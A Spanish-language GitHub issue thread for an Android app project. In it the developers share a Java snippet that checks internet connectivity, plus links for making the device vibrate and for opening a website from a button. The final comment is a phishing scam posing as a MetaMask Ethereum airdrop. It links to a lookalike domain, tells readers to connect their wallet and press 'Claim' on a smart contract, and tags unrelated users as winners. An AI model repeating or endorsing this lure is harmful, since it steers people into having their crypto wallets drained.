### ISSUE TITLE
funciones

### ISSUE THREAD

**Issue by terceranexus6** [terceranexus6/CampusInWatch#4]
FUNCION BOOLEANA PARA SABER SI HAY CONEXION A INTERNET/*
- @return boolean return true if the application can access the internet
  */
  private boolean haveInternet(){
  NetworkInfo info = ((ConnectivityManager)getSystemService(Context.CONNECTIVITY_SERVICE)).getActiveNetworkInfo();
  if (info==null || !info.isConnected()) {
      return false;
  }
  if (info.isRoaming()) {
      // here is the roaming option you can change it if you want to disable internet while roaming, just return false
      return true;
  }
  return true;
  }
  // see http://androidsnippets.com/have-internet

**Comment by terceranexus6** [comment]
import android.os.Vibrator;

PARA VIBRACION

http://stackoverflow.com/questions/13950338/how-to-make-an-android-device-vibrate

**Comment by Blackgarden** [comment]
Hay alguna otra función en mente?

**Comment by terceranexus6** [comment]
yep, esta http://stackoverflow.com/questions/5026349/how-to-open-a-website-when-a-button-is-clicked-in-android-application para lo del link

**Comment by Blackgarden** [comment]
Preparando la implementacion...

**Comment by Blackgarden** [comment]
Parece que se acerca el boton... Cuando consigamos implementarlo y que funcione, me encargo del link.

**Comment by synchrovision** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @lmdc45, @Durev, @septembermd, @ChanPoyu, @khireddine10, @maskhni2003, @coldyjudgy
